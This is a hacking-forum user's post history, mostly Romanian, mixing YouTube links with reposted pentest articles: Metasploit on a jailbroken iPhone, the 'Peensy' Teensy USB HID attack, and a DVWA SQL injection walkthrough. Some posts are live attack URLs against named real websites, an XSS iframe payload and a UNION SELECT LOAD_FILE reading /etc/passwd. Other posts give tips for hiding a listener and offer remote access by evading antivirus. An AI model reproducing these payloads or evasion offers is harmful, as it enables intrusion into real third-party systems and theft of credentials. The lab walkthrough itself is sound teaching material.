Wubi
Active Members-
Posts
893 -
Joined
-
Last visited
-
Days Won
17
Everything posted by Wubi
-
http://www.youtube.com/watch?v=eDJisKixt5A&feature=player_embedded Sursa YouTube
-
http://www.youtube.com/watch?v=EsxmpqOYylc&feature=player_embedded Sursa YouTube
-
http://www.youtube.com/watch?v=6oHBx1DFVXo&feature=player_embedded Sursa YouTube
-
- 1
-
Sursa YouTube
-
http://www.youtube.com/watch?v=0iQv_PAuoLs&feature=g-u-u
-
Pui un VPN in fata, sau chiar sa faci listen dintr`un alt server pe care te conectezi prin SSH.
-
Din ce am vazut pana acum imi pare ca fiind un macro recorder mai avansat, multe optiuni, complex, foarte bun pentru SEO, iar concursul suna promitator.
-
http://www.dubstep.net/search.php?q=%27%22%3E%3Ciframe+src%3D%22javascript%3Aalert%28%2Fxss%2F%29%3B%22%3E%3C%2Fiframe%3E%3C
-
http://www.mida.ro/content.php?id=-11+UNION+SELECT+1,2,LOAD_FILE(0x2f6574632f706173737764),4
-
MiMi ReReLaMi MiSiRe LaLaMiRe Re- FaMiSiLaReLaFaRe
-
Ma scuzati sefa, Penetration Testing Lab ,
-
Sondaj pentru verificarea utilizatorilor vechi activi
Wubi replied to a topic in Anunturi importante
Sunt activ dar nu sunt vechi. -
With the recent Absinthe Jailbreak which opens up firmware 5.1.1 to Cydia, we once again tried to get Metasploit running on these iBabies. After a bit of fiddling around with various ruby package versions, its seems like the following combination works well with the latest version of Metasploit 4.4.0-dev (as of May 2012). Of course, you need a jailbroken iPhone or iPad, with apt, OpenSSH server and a SSH client, such as iSSH. Once you are SSH’ed to your iPhone / iPad, run the following commands: # Install basic tools apt-get update apt-get dist-upgrade apt-get install wget subversion # Download correct version of ruby and dependencies wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb wget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb wget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb # Install them dpkg -i iconv_1.14-1_iphoneos-arm.deb dpkg -i zlib_1.2.3-1_iphoneos-arm.deb dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb # Delete them rm -rf *.deb # Go into /private var and svn checkout the msf trunk. # Don't download the MSF tar.gz due to svn client versioning issues cd /private/var svn co https://www.metasploit.com/svn/framework3/trunk/ msf3 cd msf3/ # Check that Metasploit is running ruby msfconsole As no blog post is complete without a reverse shell screenshot, here’s a popped shell from the iPhone: Sursa Offensive Security
-
The Peensy In one of our recent engagements, we had the opportunity to test the physical security of an organization. This assessment presented an excellent scenario for a USB HID attack, where an attacker would stealthily sneak into a server room, and connect a malicious USB device to a server with logged on console, thus compromising it. From here, the “Peensy” (Penetration Testing Teensy?) was born. The impatient can find the video demo below. Previous work There has been a significant amount of previous talk about using the Teensy device to emulate PC keyboards, as well as various methods of delivering malicious payloads to computers from the Teensy. Most notably, there are IronGeeks PHUKD library, SET Teensy payloads, and Kautilya. By cannibalizing code and ideas from various projects and web resources, we were able to improve and refine our Peensy payload to suit our needs. Design Goals Our goal was to make a custom, “uber” Teensy, which would provide dynamic and reliable functionality in the field. The Teensy would target Windows machines only (in our case, Windows 2008 servers), and should be able to cope with variables such as the architecture of the machine being attacked, whether UAC should be bypassed or not, etc. The device should also be able to cope with advanced and complex payloads, while still retaining a small form factor. Building the hardware The hardware required for this project is readily available through pjrc.com and amazon. In order to meet our design goals, we realized we would need to add an SD card reader to the teensy, as well as add a DIP switch, which would allow us to configure basic payload settings before plugging in the Teensy into a victim computer an initiating an attack. The SD card and DIP switch mount nicely on the Teensy, with no extra wiring needed. The DIP switch needs to be grounded on one side, which was achieved by cutting off two pins from the one side, and connecting them with the last pin, which ends up in the Teensy ground. The SD card can be connected easily, as shown on the PJRC site. Payload Design The basic functionality of our Teensy payload is to act as a “Trojan Dropper” for Windows based machines. We needed to address these goals specifically: Reliable deployment of the payload. Leave little to chance. The payload should be persistent and survive reboots. Should use little to no foreign executables on the victim machine. Should be able to cope with different Windows architectures and versions. Payload reliability – Execution and Deployment This is probably one of the most challenging aspects of the design. The Teesny has little support for input (NumLock, ScrollLock, CapsLock Leds) – making it harder to know if a specific operation has succeeded or not. For example, once we plug in the Teensy to a victim machine, how can it know when Windows has initialized the required drivers and is ready to accept keystrokes from it? Another good example would be opening a Windows command prompt through the Teensy – which requires a sequence of keyboard commands, timed in a certain manner. If for some reason this sequence were to be interfered with or some other mishap should occur – the Teensy keyboard commands would go out of context and probably not produce our required results. Initial Windows Initialization of the Teensy An elegant solution for figuring out when the Windows drivers are initialized and ready was found in a code snippet we found floating on the interwebz. Once the Teensy is plugged in, this function will continuously check to see if the Keyboard is reacting to a “Num Lock” key press (by checking if the corresponding Led lights up). Once the Teensy senses a reaction, it can then continue sending keyboards commands safely. void wait_for_drivers(int speed) { bool numLockTrap = is_num_on(); while(numLockTrap == is_num_on()) { blink_fast(5,80); press_numlock(); unpress_key(); delay(speed); } press_numlock(); unpress_key(); delay(speed); } void unpress_key(void) { Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(500); } Successful command feedback Opening a Windows command prompt is the foundation for all our attacks. Without this functionality, we are very limited in our payload deployment. For this reason, we need a feedback mechanism to know whether a command prompt was opened successfully and provide some “error correction” to the Teensy. One solution for this (derived from the code above) is to have Windows programmatically press num/scroll/caps keys once a command is successful – allowing the Teensy to then sense the num/scroll/caps LEDs, and make the appropriate conclusions. The following pseudo code provides an example for attempting to open a command prompt, while accepting feedback on a successful event. bool secure_prompt(int reps, int millisecs) { make_sure_numlock_is_off(); ... initialise SD card, DIP switches ... open a command prompt ... write a vbscipt that turns on numlock and execute it. check_for_numlock_sucess_teensy(reps,millisecs); } // loop (repeat) times for (speed) milliseconds bool check_for_numlock_sucess_teensy(int reps, int millisecs) { int i = 0; do { delay(millisecs); if (is_num_on()) { make_sure_numlock_is_off(); delay(700); return true; } i++; } while (!is_num_on() && (i<reps)); return false; } This feedback mechanism can be extended to other functionalities, such as downloading files, checking for internet connectivity, checking OS and CPU architecture or running other commands which take an unpredictable amount of time. For example, we might want to know if the target Windows machine has powershell installed: bool check_for_powershell(int reps, int millisecs) { bool success; make_sure_numlock_is_off(); Keyboard.println("powershell"); delay(1000); Keyboard.println("$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{NUMLOCK}')"); // "press numlock via powershell" delay(200); success=check_for_numlock_sucess_teensy(reps,milli secs); if (success) // if powershell is available we want to exit the PS prompt (but not the CMD prompt). { Keyboard.println("exit"); } return success; } Video Demo Finally, a quick video demonstration of the “Penetration Testing Teensy Payload” is in order. In the following video, we intentionally disrupted the execution flow of the keyboard commands, to see if the Teensy would “auto correct” itself. Best viewed in full screen. Alternatively, you can download the movie too. http://www.offensive-security.com/movies/teensy-offsec-payload.mp4 Peensy code Note: We did *not* extend functionality for “non powershell enabled machines” (XP, etc), however this can be added easily. We’ve released a sample sketch which contains several useful functions, as well as a skeleton demonstrating the use of the Peensy features. For those who do not care for the SD and DIP switch – we’ve also added a “stand-alone” payload which will work perfectly on a bare Teensy. We have tried to keep the code as simple and as readable as possible. You can download the Peensy sketch and utility tools from github – comments are in the code: git clone [URL]https://github.com/offensive-security/peensy.git[/URL] Future work This code is presented as a rough proof of concept for more reliable payload delivery with a Teensy. Command delays are over exaggerated and not optimized, and no attempts are made to hide the process from the screen. There are many possible improvements that can be made to this whole process, as well as additional features. One of the interesting feature we have not yet added to this version of Peensy is a simple, optimized communication protocol between the Teensy and victim computer using the keyboard LEDs. We will introduce this feature in future code updates. Sursa Offensive Security
-
- 1
-
http://www.youtube.com/watch?v=ryjq4TOg-1s&feature=player_embedded Sursa YouTube
-
SQL injection is considered a high risk vulnerability due to the fact that can lead to full compromise of the remote system.This is why in almost all web application penetration testing engagements,the applications are always checked for SQL injection flaws.A general and simple definition of when an application is vulnerable to SQL injection is when the application allows you to interact with the database and to execute queries on the database then it is vulnerable to SQL injection attacks. There are many vulnerable applications that you can try in order to learn about SQL injection exploitation but in this article we will focus on the Damn Vulnerable Web Application (DVWA) and how we can extract information from the database by using SQL injection.Of course the methodology can be used and for any real life scenario in web application penetration tests. In order to exploit SQL injection vulnerabilities we need to figure out how the query is built in order to inject our parameter in a situation that the query will remain true.For example in the DVWA we can see a text field where it asks for user ID.If we enter the number 1 and we click on the submit button we will notice that it will return the first name and the surname of the user with ID=1. This means that the query that was executed back in the database was the following: SELECT First_Name,Last_Name FROM users WHERE ID=’1?; Now let’s have a look at the URL: http://172.16.212.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# The injectable parameter on the URL is of course the id field so before we do anything else we can try to change the ID number on the URL to other values (i.e 2,3,4 etc.) in order to find the first names and surnames of all the users.For example we have discovered the following: id=2 —–> First Name: Gordon Surname: Brown id=3 —–> First Name: Hack Surname: Me id=4 —–> First Name: Pablo Surname: Picasso id=5 —–> First Name: Bob Surname: Smith An alternative solution that would extract all the First names and Surnames from the table it would be to use the following injection string.The SQL query in this case will be something like this: SELECT First_Name,Last_Name FROM users WHERE ID=a’ OR ”=’; The above statement it is always true so it will cause the application to return all the results. Extracting all the First names and Surnames with one query The next step will be to try to identify what kind of database is running on the back-end in order to construct the queries accordingly and to extract the information that we want.This is very important because If we don’t know the database that exists behind we will not be able to exploit successfully the SQL injection vulnerability.Most of the times the web application technology (Java,ASP.NET,PHP etc.) will give us an idea of the database that the application is using.For example ASP.NET applications often using Microsoft SQL Server,PHP applications is likely to use MySQL and Java probably Oracle or MySQL.Additionally we can assume the database type from the web server and operating system of the target.For example if the web server is running Apache and PHP and it is a Linux host then the database has more possibilities to be MySQL.If it is an IIS then it is probably Microsoft SQL Server.Of course we cannot rely on these information,this is just for giving us an indication in order to speed the database fingerprint process. We can very easily identify the database type especially if we are in a non-blind situation.The basic idea is to make the database to respond in a way that it will produce an error message that it will contain the database type and version. For example this can be achieved by a single quote because it will force the database to consider any characters that are following the quote as a string and not as SQL code and it will cause a syntax error.So now if we add a single quote on the vulnerable parameter id=’ this will make the database to generate an error message which as we can see from the image below it contains the database type which is MySQL server. Identifying the Database type via database error message Unfortunately in this example the web application didn’t return and the exact version of the database.However now that we know that the database is MySQL we can use the appropriate queries to find and the version.In MySQL the queries that will return the version of the database are the following: Select version() and Select @@version So we will use the UNION statement in order to join two queries and to be able to discover the version of the database.Lets try to see what will happen if we give the following query: ‘ union select @@version# Different number of columns when the UNION statement was used This error indicates that the two select statements have not the same number of columns.That’s why we cannot have a proper result.In order to bypass this error there are two methods.Either we can increase the number of columns gradually of the second query until it returns the same number of columns with the first or we can use instead the null value as the null value can be converted to any data type. So we have the query ‘ union select @@version# which provides us an error before.if we try to increase the number of columns by 1 the query will be: ‘ union select 1,@@version# The hash (#) sign is used in order to comment out the following SQL.We can see the result that we will have in the following image: UNION statement – Same number of columns The query was executed successfully and we now have and the exact version of the MySQL.Alternatively we could have used the null value in order to fingerprint the database.The result would been exactly the same. UNION statement with null value usage The hostname of our target can be discovered with the @@hostname statement.Specifically we will have: ‘ union select null,@@hostname # which will produce the following result: Hostname Discovery through SQL Injection Now that we have identify the database version and the hostname is time to find the number of columns.The order by command is used to sort information in a table.So we know from above that the structure of the query is the following: SELECT First_Name,Last_Name FROM users WHERE ID=’1?; We can query the available columns of the table by using the order by syntax.So for example the query will be: SELECT First_Name,Last_Name FROM users WHERE ID=’ ‘ order by 1 # Discovery of the number of columns As we can see and from the image above we didn’t get any error once the query has executed.This means that there is at least one column returned from the above query.Now if we try to increase the number of the columns by one making the query‘ order by 2 # we will not notice any changes and the page will be displayed properly.This also means that there are at least 2 columns.However if we try to increase by 3 (‘ order by 3 #) then we will notice the following error: Wrong number of columns This means that the are only 2 columns returned when the above query is executed which in this case are the First_Name and Last_Name. Next we will try to find the current database user.In MySQL the queries that can retrieve the current database user are two: SELECT user(); SELECT current_user; So if we try the following statement ‘ union all select system_user(),user() # it will combine the two select queries and it will allow also duplicate values in the results because we have used the union all operator.We can see the result of the following query in the next image: Discovery of the current database user As we can see the current database user and the system user as well is the root@localhost.Now we can use the ‘ union select null,database() # to find the database name which in this case is the dvwa as we can see and from the image below: Database Name Discovery The database version is 5.0.51a this means that we can list all the available databases on the remote MySQL installation with the command select schema_name from information_schema.schemata which allows us to extract that kind of information regardless if we have administrator level privileges.So in our case and based on the previous query we will have: ‘ union select null,schema_name from information_schema.schemata and this will return to us the current databases which are the following:dvwa,metasploit,mysql,owasp10,tikiwiki and tikiwiki195. Current MySQL databases Now that we have retrieved the databases we can try to discover the table names of the information_schema by using the following query: ‘ union select null,table_name from information_schema.tables # Sample of the tables of Information_Schema The information_schema is the database that contains information for all others databases that the MySQL maintains.Alternatively we can retrieve the tables from any database we want.In this example we will extract the tables from the database owasp10.So the query will be: ‘ union select null,table_name from information_schema.tables where table_schema = ‘owasp10? # owasp10 – tables String concatenation can be also used in case that we want to join two or three strings to a single string.For example the following query will extract the column names of the table users: ‘ union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name= ‘users’ # Discover Column Names of Table users So we now have the columns from the table users.We can see that there is a column with the name password so we might want to display the contents of this along with the first name or last name of the user.So we need to execute the following query: ‘ union select null,concat(first_name,0x0a,password) from users # Display the first name and the password hash of the table users Now we have all the hashes for all the users which can be cracked offline.Another simple query that we can execute and it will return us the location of the database on the remote system system is the ‘ union select null,@@datadir # Location of Database Files We can also try to read a file from the remote system.The path that we are always looking for is of course the /etc/passwd where older Linux systems were storing the passwords.We will execute the following query: ‘ union all select load_file(‘/etc/passwd’),null # and we will get the following result: Read the contents of passwd file Conclusion As we saw from this article SQL injection is a high critical vulnerability because once it has been discovered it allows us with the use of the appropriate queries to extract information both from the database and the system.Damn vulnerable web application give us the opportunity to exploit this vulnerability in order to understand better how sql injection works and of course to stay ethical. Sursa Penetration Testing Lab
-
Let me give a try. I can give you fully remote acces in a few different ways, through antiviruses. I will install on my sistem later today that shit, if I can bypass it I`ll come back with a reply or a private message. Basically I could do that, never heard about problems like that with norton.